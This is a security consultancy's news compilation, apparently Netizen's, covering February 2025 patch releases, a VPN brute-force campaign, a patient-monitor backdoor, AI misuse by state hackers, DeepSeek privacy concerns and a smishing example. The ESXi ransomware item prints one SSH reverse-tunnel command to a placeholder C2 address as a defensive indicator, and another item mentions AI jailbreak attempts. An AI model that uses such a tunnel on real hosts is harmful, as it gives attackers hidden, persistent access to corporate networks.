Microsoft’s February 2025 Patch Tuesday addresses a total of 55 vulnerabilities, including four zero-day flaws, with two actively exploited in attacks. This month’s update also fixes three critical vulnerabilities, all classified as remote code execution (RCE) flaws.
Breakdown of Vulnerabilities
The vulnerabilities addressed this month include:
19 Elevation of Privilege (EoP) vulnerabilities
2 Security Feature Bypass vulnerabilities
22 Remote Code Execution (RCE) vulnerabilities
1 Information Disclosure vulnerability
9 Denial of Service (DoS) vulnerabilities
3 Spoofing vulnerabilities
These totals exclude one critical Microsoft Dynamics 365 Sales elevation of privilege flaw and ten Microsoft Edge vulnerabilities that were patched on February 6. For non-security updates, see the Windows 11 KB5051987 & KB5051989 cumulative updates and the Windows 10 KB5051974 update.
Zero-Day Vulnerabilities
This month’s Patch Tuesday resolves four zero-day vulnerabilities, with two actively exploited and two publicly disclosed:
Actively Exploited Zero-Days
CVE-2025-21391 | Windows Storage Elevation of Privilege Vulnerability
Affects: Windows Storage This vulnerability allows attackers to delete targeted files on a system. While it does not expose confidential data, it could be used to disrupt services by deleting critical files. Microsoft has not disclosed details about how this vulnerability was exploited in the wild.
CVE-2025-21418 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
Affects: Windows Ancillary Function Driver for WinSock This vulnerability enables attackers to escalate privileges to SYSTEM level. Microsoft has not shared details on how it has been exploited but confirms that it was disclosed anonymously.
Publicly Disclosed Zero-Days
CVE-2025-21194 | Microsoft Surface Security Feature Bypass Vulnerability
Affects: Microsoft Surface and Hypervisor Products This hypervisor vulnerability allows attackers to bypass UEFI protections, compromising the secure kernel. Discovered by Francisco Falcón and Iván Arce of Quarkslab, this flaw is likely linked to the PixieFail vulnerabilities affecting the IPv6 network protocol stack in Tianocore’s EDK II, which is used in Microsoft Surface and hypervisor products.
Affects: Windows NTLM Authentication This vulnerability exposes NTLM hashes when a user interacts with a malicious file. Simply selecting or right-clicking a file could trigger a remote connection, allowing an attacker to capture NTLM hashes for cracking or pass-the-hash attacks. It was discovered by Owen Cheung, Ivan Sheung, and Vincent Yau (Cathay Pacific), Yorick Koster (Securify B.V.), and Blaz Satler (0patch by ACROS Security).
Vendor Updates
Adobe: Released security updates for Photoshop, Substance3D, Illustrator, and Animate. AMD: Issued firmware updates to mitigate a vulnerability allowing malicious CPU microcode injection. Apple: Fixed a zero-day vulnerability exploited in sophisticated attacks. Cisco: Patched security flaws in Cisco IOS, ISE, NX-OS, and Identity Services. Google: Fixed an actively exploited zero-day in Android Kernel’s USB Video Class driver.
Recommendations for Users and Administrators
Organizations should apply the February 2025 Patch Tuesday updates as soon as possible, with priority given to the actively exploited zero-days and critical RCE vulnerabilities. Keeping systems updated is crucial to reducing exposure to potential attacks. For detailed guidance, refer to Microsoft’s official security bulletins or consult IT security teams.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Massive Brute Force Attack Targets VPN Devices Using 2.8 Million IPs
Hospital Sisters Health System Data Breach Exposes Personal Information of 883,000 Individuals
How can Netizen help?
Massive Brute Force Attack Targets VPN Devices Using 2.8 Million IPs
A widespread brute force attack has been detected, involving nearly 2.8 million unique IP addresses in an attempt to compromise credentials for networking devices, including those from well-known vendors like Palo Alto Networks, Ivanti, and SonicWall.
Brute force attacks occur when attackers try multiple username and password combinations until they find the correct one. Once successful, the attacker gains unauthorized access to the device or network, potentially leading to serious security breaches.
According to The Shadowserver Foundation, a threat intelligence platform, this attack has been ongoing since last month. It has escalated significantly, with the attackers leveraging around 2.8 million distinct IP addresses every day. A majority of these addresses (1.1 million) originate from Brazil, with other notable sources including Turkey, Russia, Argentina, Morocco, and Mexico. However, the attacks have a global reach, with many countries contributing to the effort.
The devices targeted are primarily edge security devices, such as firewalls, VPNs, and gateways, which are often exposed to the internet to allow remote access. The attackers are using compromised devices, including MikroTik, Huawei, Cisco, Boa, and ZTE routers, as well as IoT devices. These devices are commonly hijacked by large malware botnets.
The Shadowserver Foundation confirmed that the attack has been progressing for some time but has recently grown in scale. The attacking IP addresses are distributed across various networks and Autonomous Systems, indicating that the operation is likely backed by a botnet or a group utilizing residential proxy networks.
Residential proxies are IP addresses assigned by Internet Service Providers (ISPs) to regular consumer customers. These proxies are increasingly used in cybercrime operations, including data scraping, bypassing geo-restrictions, ad verification, and ticket scalping. Since residential proxies route traffic through home networks, they appear to be legitimate users, making it more difficult to detect malicious activity.
Devices targeted in this attack, such as gateways, could potentially serve as proxy exit nodes for cybercriminals. These nodes are highly valued because they use the trusted reputation of enterprise networks, making malicious traffic harder to identify and block.
To protect edge devices from these types of brute force attacks, experts recommend several steps. Changing the default admin password to a strong, unique one is crucial. Enforcing multi-factor authentication (MFA), using an allowlist of trusted IPs, and disabling unnecessary web admin interfaces can also help prevent unauthorized access. Regularly updating device firmware and applying security patches is essential to close vulnerabilities that attackers might exploit.
In related incidents, last April, Cisco warned of a similar brute force campaign targeting a variety of devices from Cisco, CheckPoint, Fortinet, SonicWall, and Ubiquiti. In December, Citrix issued a warning about password spray attacks targeting Citrix Netscaler devices worldwide.
Hospital Sisters Health System Data Breach Exposes Personal Information of 883,000 Individuals
A significant cyberattack in August 2023 severely disrupted operations at Hospital Sisters Health System (HSHS), compromising the personal data of approximately 883,000 individuals.
The breach, which began on August 27, 2023, led to widespread outages that affected internal systems, communication platforms, phone lines, applications, and the hospital’s website, as well as the MyChart and MyPrevea services. The disruption lasted several days, forcing all 15 HSHS hospitals in Wisconsin and Illinois, alongside Prevea Health clinics, to implement emergency downtime protocols. Despite the technical issues, patient care continued without interruption.
An investigation into the attack revealed that hackers gained access to the healthcare system’s network from August 16 to August 27, during which they accessed sensitive files containing personal data. The potentially compromised information includes names, addresses, dates of birth, Social Security numbers, driver’s license numbers, medical record numbers, treatment details, and health insurance information.
While HSHS began notifying affected individuals in October 2023, it wasn’t until August 2024, a full year after the breach, that the healthcare provider was able to confirm the scale of the incident. In September 2024, HSHS issued an open letter acknowledging that some affected patients had been targeted in fraud schemes by individuals posing as HSHS representatives.
This week, HSHS notified the Maine Attorney General’s Office that the breach had impacted 882,782 people. In response, HSHS is offering free identity theft protection and credit monitoring services to those affected by the breach.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Food and Drug Administration (FDA) have issued urgent warnings about serious security vulnerabilities in Contec CMS8000 patient monitors. These flaws could allow remote attackers to gain unauthorized access, manipulate device settings, and exfiltrate sensitive patient data. As a result, healthcare providers are strongly advised to disconnect affected devices from the internet and remove them from their networks to prevent potential exploitation.
Critical Backdoor Discovered in Contec CMS8000 Monitors
Manufactured by the Chinese company Contec Medical Systems, the CMS8000 patient monitors are widely used in healthcare facilities across the U.S. and Europe to track vital signs such as heart rate, oxygen levels, and blood pressure. However, CISA has uncovered a backdoor in the device’s firmware that enables remote file uploads and system modifications, bypassing standard network security controls.
According to a newly released CISA fact sheet, the backdoor establishes automated connections to a hardcoded IP address linked to an external third-party university, rather than a legitimate medical organization. This security flaw, tracked as CVE-2025-0626, has been assigned a CVSS severity score of 7.7, indicating a high risk of remote code execution and system compromise.
Data Exposure and Information Leakage
In addition to the backdoor, security researchers have identified CVE-2025-0683, an information exposure vulnerability rated 5.9 on the CVSS scale. This flaw allows the CMS8000 monitor to transmit patient data in plaintext over the internet to a hardcoded IP address. Attackers could intercept this unencrypted information through a man-in-the-middle (MitM) attack, leading to serious privacy breaches affecting personally identifiable information (PII) and protected health information (PHI).
Further investigation has revealed CVE-2024-12248, an out-of-bounds write vulnerability with a severity rating of 9.3, that could enable attackers to send malicious payloads, overwrite critical system files, and execute arbitrary commands remotely. This exploit poses a direct risk to patient safety, as compromised monitors could display inaccurate readings, potentially leading to misdiagnoses or delayed medical interventions.
No Available Patch – Immediate Action Required
Currently, there are no software patches available to fix these vulnerabilities, leaving affected devices exposed to potential cyberattacks. The FDA and CISA have recommended that all healthcare providers take the following immediate actions:
Disconnect vulnerable devices from the internet. If remote monitoring features are not essential, unplug the Ethernet cable and disable wireless connectivity (WiFi or cellular).
Verify device firmware versions. If the monitor is running an affected firmware iteration, assume it is compromised.
Assess potential network compromise. Any system that has been connected to a vulnerable device may require further security reviews.
Replace or remove affected monitors. Since no patch is available, healthcare organizations should consider replacing Contec CMS8000 and rebranded models like the Epsimed MN-120 with secure alternatives.
Prior Security Concerns with Contec Monitors
This is not the first time Contec’s patient monitoring systems have raised cybersecurity concerns. In 2022, CISA identified five additional vulnerabilities in the same firmware, including issues that allowed attackers to:
Modify device firmware with physical access
Gain root shell access
Use hardcoded credentials to alter device configurations
Trigger denial-of-service (DoS) conditions
Despite these prior warnings, Contec has not provided security updates to address these risks, increasing the urgency for healthcare providers to take precautionary measures.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Ransomware gangs targeting VMware ESXi bare metal hypervisors are using SSH tunneling to maintain persistence and evade detection within corporate networks. Here’s what you need to know:
ESXi: A High-Value Target
VMware ESXi hypervisors play a critical role in virtualized environments, hosting multiple virtual machines (VMs) on a single physical server. These appliances are often under-monitored, making them a prime target for attackers aiming to steal data, deploy ransomware, and render entire infrastructures inoperable by encrypting VMs.
Entry Points and Exploitation
According to cybersecurity firm Sygnia, attackers gain access by exploiting known vulnerabilities or using stolen administrator credentials. Once access is obtained, ransomware actors use ESXi’s built-in SSH service to set up covert connections, establish persistence, and move laterally within the network.
Leveraging SSH for Stealthy Persistence
The SSH service in ESXi allows administrators to remotely manage the hypervisor, but attackers abuse this feature for malicious purposes. Using SSH, they can establish reverse port-forwarding tunnels to their command-and-control (C2) servers with a single command:
phpCopyEditssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
Since ESXi appliances are rarely rebooted, these tunnels act as semi-persistent backdoors, enabling attackers to operate undetected over extended periods.
Logging Challenges on ESXi
Monitoring ESXi activity is complicated by its fragmented logging system. Unlike traditional systems with consolidated logs, ESXi disperses logs across multiple files, creating visibility gaps that attackers exploit. Key logs to monitor for SSH activity include:
/var/log/shell.log: Tracks commands executed in the ESXi shell.
/var/log/hostd.log: Logs administrative actions and user authentication.
/var/log/auth.log: Captures login attempts and authentication events.
/var/log/vobd.log: Stores system and security event data.
Additionally, attackers may modify or delete logs to obscure evidence of their presence, complicating forensic investigations.
What SOC Teams Need to Know
To effectively address the evolving threat landscape targeting VMware ESXi hypervisors, Security Operations Center (SOC) teams must prioritize proactive monitoring and response strategies. Below are key focus areas for SOC teams to enhance their defenses and mitigate risks associated with SSH tunneling and ransomware activity:
1. Prioritize ESXi Logging and Monitoring
Centralize Logs: Integrate ESXi logs into a centralized Security Information and Event Management (SIEM) system to detect anomalies and improve visibility across the infrastructure.
Monitor Key Log Files: Regularly review critical ESXi logs such as shell.log, auth.log, hostd.log, and vobd.log for unusual activity, including unauthorized SSH connections and firewall modifications.
Detect Log Tampering: Look for gaps, missing logs, or unusual timestamps that could indicate attacker attempts to cover their tracks.
2. Enhance SSH Security
Restrict SSH Access: Limit SSH usage to authorized personnel and trusted IP addresses. Configure firewalls to block unauthorized connections and disable SSH access when not in active use.
Implement Multi-Factor Authentication (MFA): Strengthen SSH authentication with MFA to prevent unauthorized access even if credentials are compromised.
Audit SSH Activity: Monitor for abnormal SSH usage patterns, such as frequent remote connections or high-volume data transfers.
3. Hardening ESXi Configurations
Apply Regular Updates: Ensure ESXi systems are up to date with the latest patches and security updates to address known vulnerabilities.
Enforce Least Privilege: Limit administrative permissions to only those necessary for specific tasks, reducing the risk of credential abuse.
Review Firewall Rules: Regularly audit and harden firewall configurations to block unauthorized access and close unused ports.
4. Threat Hunting and Anomaly Detection
Identify Indicators of Compromise (IOCs): Train SOC analysts to recognize IOCs associated with SSH tunneling and ransomware campaigns, such as new or unknown SSH keys and unusual remote port-forwarding activity.
Establish Baselines: Understand normal traffic patterns in your environment to more effectively identify anomalies.
Conduct Proactive Threat Hunts: Leverage threat intelligence and hunt for signs of compromise across all ESXi systems, focusing on both live traffic and historical logs.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Google Reports State-Sponsored Hackers Abusing Gemini AI for Cyber Operations
Texas Bans DeepSeek and RedNote from Government Devices Over Security Concerns
How can Netizen help?
Google Reports State-Sponsored Hackers Abusing Gemini AI for Cyber Operations
Google has revealed that state-backed hacking groups are increasingly experimenting with its AI-powered Gemini assistant to enhance their cyber capabilities. According to Google’s Threat Intelligence Group (GTIG), these advanced persistent threat (APT) actors primarily use Gemini for productivity purposes, rather than for creating or executing AI-driven cyberattacks.
While AI tools have yet to revolutionize cyberattacks, threat actors are leveraging them to speed up various stages of their operations, including reconnaissance, research, and scripting. Google has identified activity linked to APT groups from over 20 countries, with particularly high usage from actors associated with Iran and China.
Google’s report outlines how state-sponsored hacking groups, including those from Iran, China, North Korea, and Russia, have been experimenting with Gemini to improve their operational efficiency. Their activities include:
Iranian APTs: The most active users of Gemini, Iranian hackers have used it for reconnaissance on defense organizations and experts, researching publicly known vulnerabilities, crafting phishing campaigns, and generating content for influence operations. They have also sought translations and technical explanations related to cybersecurity and military technologies, such as unmanned aerial vehicles (UAVs) and missile defense systems.
Chinese APTs: These groups have focused on reconnaissance targeting U.S. military and government organizations, researching vulnerabilities, scripting for lateral movement and privilege escalation, and evasion techniques for post-compromise persistence. Additionally, they have attempted to access Microsoft Exchange using password hashes and reverse-engineer security tools like Carbon Black EDR.
North Korean APTs: Their use of Gemini has supported multiple attack phases, including identifying free hosting providers for infrastructure, conducting reconnaissance on target organizations, and developing malware with enhanced evasion techniques. North Korean hackers have also exploited Gemini to draft job applications and cover letters as part of efforts to infiltrate Western companies under false identities.
Russian APTs: Russian hackers have had limited engagement with Gemini, mainly using it for scripting assistance, translation, and malware development. Activities included rewriting malware in different programming languages, adding encryption to malicious code, and analyzing existing public malware. Their minimal use may indicate a preference for domestic AI models or an operational security decision to avoid Western AI platforms.
Google notes that some APT actors attempted to circumvent Gemini’s security restrictions by using public jailbreak techniques or rewording their prompts. However, these attempts were reportedly unsuccessful.
The misuse of generative AI by cybercriminals is not limited to Gemini. OpenAI previously disclosed similar activity involving ChatGPT in October 2024, indicating a broader trend of AI exploitation by threat actors.
While major AI providers implement security measures to prevent abuse, the growing number of AI models with weak protections is a concern. Cybersecurity firm KELA recently highlighted security flaws in DeepSeek R1 and Alibaba’s Qwen 2.5, showing they are vulnerable to prompt injection attacks. Additionally, Unit 42 researchers demonstrated how easily DeepSeek R1 and V3 could be jailbroken for malicious use.
As AI tools become more sophisticated, their misuse by threat actors is likely to expand. While Gemini and ChatGPT have security safeguards in place, the emergence of AI platforms with weak or nonexistent restrictions creates new challenges for cybersecurity defenders. Organizations must remain vigilant, implementing strict AI usage policies and monitoring for potential abuse by threat actors seeking to exploit these technologies for malicious purposes.
Texas Bans DeepSeek and RedNote from Government Devices Over Security Concerns
Texas Governor Greg Abbott has ordered a ban on Chinese AI platform DeepSeek and social media apps RedNote (Xiaohongshu) and Lemon8 from all state-issued devices, citing concerns over data security and potential foreign influence. Texas is the first state to impose such a restriction on DeepSeek, which has recently surged in popularity among U.S. users.
In a statement, Abbott emphasized the state’s commitment to protecting critical infrastructure from foreign threats. “Texas will not allow the Chinese Communist Party to infiltrate our state’s critical infrastructure through data-harvesting AI and social media apps,” he said. “Texas will continue to protect and defend our state from hostile foreign actors.”
The governor’s office declined to provide further details on the decision.
DeepSeek, a rapidly growing AI startup, has gained attention for its ability to rival OpenAI’s models. Meanwhile, RedNote (Xiaohongshu) and Lemon8, both owned by Chinese companies, have seen increased adoption in the U.S., particularly after the brief ban on TikTok. Xiaohongshu, widely used in China and neighboring countries, has around 300 million active users and was adopted by many Americans as a TikTok alternative and protest tool against restrictions on the popular video-sharing app.
Lemon8, owned by ByteDance—the same company behind TikTok—also gained traction leading up to TikTok’s temporary ban on January 19.
Texas’ move follows broader efforts at both the state and federal levels to restrict access to Chinese-owned platforms on government devices. TikTok has already been banned on government-issued devices in Texas and multiple other states, and its future remains uncertain as ByteDance navigates ongoing U.S. regulatory scrutiny.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Security vulnerabilities are a common occurrence in managing any business’s organizational security. The prompt patching and remediation of any new vulnerabilities are critical to reducing the outside attack surface. Netizen’s Security Operations Center (SOC) has compiled five critical vulnerabilities from December that should be immediately patched or addressed if present in your environment. Detailed writeups below:
CVE-2025-21366
CVE-2025-21366 is a high-severity remote code execution (RCE) vulnerability affecting Microsoft Access. This flaw, disclosed in Microsoft’s January 2025 Patch Tuesday, poses a significant risk as it could allow an attacker to execute arbitrary code on a targeted system.
The vulnerability is rated with a CVSS v3 base score of 7.8, indicating a serious threat, particularly in environments where Microsoft Access is widely used for database management. Exploitation of CVE-2025-21366 requires user interaction, meaning an attacker would likely need to convince a user to open a malicious file or perform an action that triggers the vulnerability. Once exploited, the attacker could gain high privileges on the affected system, leading to potential data compromise, unauthorized system modifications, or further exploitation of the network.
Microsoft has released a security update to address CVE-2025-21366, and organizations are strongly advised to apply the patch as soon as possible to mitigate the risk. Given the potential for exploitation and the widespread use of Microsoft Access in enterprise environments, timely remediation is crucial to prevent security breaches.
CVE-2025-21333
CVE-2025-21333 is a high-severity elevation of privilege vulnerability affecting Windows Hyper-V’s NT Kernel Integration VSP. This flaw, disclosed as part of Microsoft’s January 2025 Patch Tuesday, is particularly concerning as it could allow an attacker to escalate privileges within a virtualized environment, potentially compromising the host system.
With a total of 157 vulnerabilities addressed in this patch cycle—the largest ever for a Microsoft Patch Tuesday—CVE-2025-21333 stands out due to its impact on virtualized infrastructures. The vulnerability exists in Hyper-V’s integration services, which facilitate communication between guest virtual machines and the host operating system. If exploited, an attacker with limited access to a virtual machine could leverage this flaw to execute code with elevated privileges, potentially affecting other virtual machines or the underlying Hyper-V host.
Organizations relying on Hyper-V for virtualization should prioritize applying this patch to prevent potential privilege escalation attacks that could compromise their cloud or on-premises virtual environments. Given the critical nature of this vulnerability and its potential to be chained with other exploits, timely remediation is strongly recommended.
CVE-2025-0282
CVE-2025-0282 is a critical stack-based buffer overflow vulnerability affecting Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. The flaw, present in Ivanti Connect Secure before version 22.7R2.5, Policy Secure before version 22.7R1.2, and Neurons for ZTA gateways before version 22.7R2.3, allows a remote unauthenticated attacker to achieve remote code execution (RCE).
Ivanti disclosed this vulnerability alongside another related flaw, revealing that CVE-2025-0282 had already been actively exploited as a zero-day before the official disclosure. This means that attackers were leveraging the vulnerability in real-world attacks before security patches were available. The flaw enables attackers to execute arbitrary code on vulnerable systems, potentially leading to full system compromise, data exfiltration, and further network infiltration.
Given its critical severity and the fact that exploitation has been observed in the wild, organizations using affected Ivanti products should prioritize immediate patching. Delays in remediation could leave enterprises at significant risk, especially considering that high-profile targets, such as national infrastructure and enterprises, have already been affected. Security researchers have warned that many Ivanti VPNs remain unpatched despite the availability of fixes, further increasing the urgency for administrators to deploy the necessary updates as soon as possible.
CVE-2025-21275
CVE-2025-21275 is a high-severity elevation of privilege vulnerability affecting the Windows App Package Installer. This flaw allows attackers with local access to escalate their privileges, potentially gaining control over a system. Exploiting this vulnerability does not require user interaction but does require prior access to the machine with limited privileges.
The vulnerability was disclosed as part of Microsoft’s January 2025 Patch Tuesday, which addressed a total of 157 CVEs. Given the nature of privilege escalation vulnerabilities, CVE-2025-21275 could be exploited as part of a larger attack chain, allowing adversaries to gain higher-level access on compromised systems.
Organizations and individual users should apply the security updates released by Microsoft as soon as possible to mitigate the risk. Delaying patching could leave systems vulnerable to attacks leveraging this flaw to gain unauthorized access and execute malicious actions with elevated privileges.
CVE-2025-21307
CVE-2025-21307 is a critical remote code execution vulnerability affecting the Windows Reliable Multicast Transport Driver (RMCAST). This flaw, with a CVSS v3 base score of 9.8, allows unauthenticated attackers to execute arbitrary code remotely without requiring user interaction. Due to its low attack complexity and high impact on confidentiality, integrity, and availability, this vulnerability poses a significant risk to affected systems.
Microsoft disclosed the issue as part of the January 2025 Patch Tuesday security updates, urging organizations to apply the necessary patches immediately. Given its critical severity, threat actors could exploit CVE-2025-21307 to deploy malware, disrupt services, or gain unauthorized access to networks.
Users and administrators should prioritize patching systems running vulnerable versions of Windows to mitigate potential exploitation. Unpatched systems remain highly susceptible to remote attacks, which could lead to full system compromise.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
Is DeepSeek Safe to Use? A Dive into Privacy and Security Concerns
Apple Fixes First Actively Exploited iOS Zero-Day of 2025
How can Netizen help?
Phish Tale of the Week
Often times phishing campaigns, created by malicious actors, target users by utilizing social engineering. For example, in this email, the actors are appearing as an unnamed company. They’re sending us a text message, asking us if we’re looking for a remote job, and that it’s imperative that we click the link below. It seems both urgent and genuine, so why shouldn’t we? Luckily, there’s plenty of reasons that point to this being a scam.
Here’s how we can tell not to fall for this phish:
The first warning sign for this SMS is the context in which it was sent. When I recieved this SMS, I immediately knew not to click on the link due to the fact that I did not recently inquire anywhere about any remote work; Real companies looking to recruit qualified employees would not reach out to numbers in this way. On top of that, it’s very apparent that this message was blasted out to random numbers: the message doesn’t even include my name or attempt to provide any level of familiarity that would convince me to click on their fake WhatsApp link.
The second warning signs in this email is the messaging. This message tries to create a sense of opportunity and urgency in order to get you to take action by using language such as “You only need to invest 20 minutes a day.” Phishing and smishing scams commonly attempt to create a sense of urgency/confusion in their messages in order to get you to click their link without thinking about it first. Always be sure to thoroughly inspect the style and tone of all texts before following a link or other attachment sent through SMS.
The final warning sign for this email is the wording. The grammar is strange and unprofessional, a real job offer or recruiter would not send out an SMS blast to several people like this. All of these factors point to the above being a smishing text, and a very unsophisticated one at that.
General Recommendations:
A phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via your text messages.
Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
Verify that the sender is actually from the company sending the message.
Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
Do not give out personal or company information over the internet.
Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.
Many phishing messages pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
Cybersecurity Brief
In this month’s Cybersecurity Brief:
Is DeepSeek Safe to Use? A Dive into Privacy and Security Concerns
DeepSeek AI has taken the tech world by storm, rising to the top of app store rankings and positioning itself as a strong competitor to OpenAi’s ChatGPT. However, despite its rapid success, the Chinese AI platform has raised serious privacy and security concerns—issues that even traditional privacy tools like VPNs may not fully protect against.
DeepSeek was barely a week into its public release when it suffered a large-scale cyberattack, forcing the platform to limit new user registrations. While existing users could still log in, the attack disrupted services, and DeepSeek acknowledged ongoing performance issues on its status page.
Although the company has not disclosed specific details about the attack, cybersecurity experts suspect it was a distributed denial-of-service (DDoS) attack, which overwhelms a system with excessive traffic, causing it to crash. This incident raises critical questions about DeepSeek’s security infrastructure and its ability to protect user data.
Beyond cybersecurity threats, DeepSeek’s privacy policy has sparked significant concerns regarding how the platform collects, stores, and shares user data. Here are some key takeaways:
DeepSeek requires users to sign in via Google, granting the platform access to personal information, including:
Full name
Email address
Profile picture (if available)
While this may seem standard, the policy states that DeepSeek may also collect additional information from third-party services, potentially exposing more user data than anticipated.
DeepSeek not only collects data on its own platform but also tracks user activity across other websites and services. The platform’s advertising and analytics partners share information about user actions outside of DeepSeek, including:
Websites visited
Products purchased
Online interactions
Even if DeepSeek claims to “anonymize” data, this level of tracking significantly compromises user privacy.
One of the most alarming discoveries in DeepSeek’s privacy policy is its collection of keystroke patterns and rhythms. This means the AI tool is capable of:
Logging every key you press
Monitoring how long you press each key
Recording the speed and pattern of your typing
This level of tracking is highly invasive, as keystroke logging can reveal sensitive information such as passwords and private conversations. Worse still, DeepSeek does not clearly state how long this data is stored or whether it can ever be fully deleted.
DeepSeek states it retains user data for as long as necessary, but it does not define a specific timeframe. This vague policy means that your personal information could be stored indefinitely, leaving it vulnerable to potential misuse or unauthorized access.
DeepSeek’s data is stored on servers located in China, raising additional concerns about how user information is managed and whether it is subject to government surveillance. The terms of service confirm that the platform is governed by Chinese laws, meaning any collected data could potentially be accessed by state authorities.
DeepSeek’s vulnerabilities extend beyond privacy concerns. Cybersecurity researchers at KELA have successfully jailbroken DeepSeek’s AI model, proving that it can be manipulated to:
Generate ransomware
Provide instructions for creating toxins
Fabricate sensitive content
The “Evil Jailbreak” exploit, which bypasses AI safety mechanisms, was previously patched in ChatGPT 3.5—but DeepSeek remains vulnerable.
KELA’s findings highlight how easily the AI model can be exploited, making it a potential tool for cybercriminals. This is particularly concerning given that AI-driven malware development, phishing scams, and fraud are already on the rise.
DeepSeek’s ties to China’s legal and cybersecurity frameworks have sparked comparisons to TikTok, which has faced scrutiny over its data-sharing policies. The Chinese government has extensive control over internet regulations, meaning that DeepSeek’s collected data could be subject to state oversight.
Users have also reported that DeepSeek censors politically sensitive topics, such as Tiananmen Square and Taiwan, further fueling concerns about government influence.
While DeepSeek’s AI capabilities may be impressive, its security flaws, invasive tracking, and questionable data policies make it a high-risk platform for privacy-conscious users. Here’s why you might want to reconsider:
Cyberattacks have already disrupted the platform—indicating weak security measures.
User data is extensively tracked and shared, including across third-party sites.
Keystroke logging poses a major privacy threat, with no clear data retention policy.
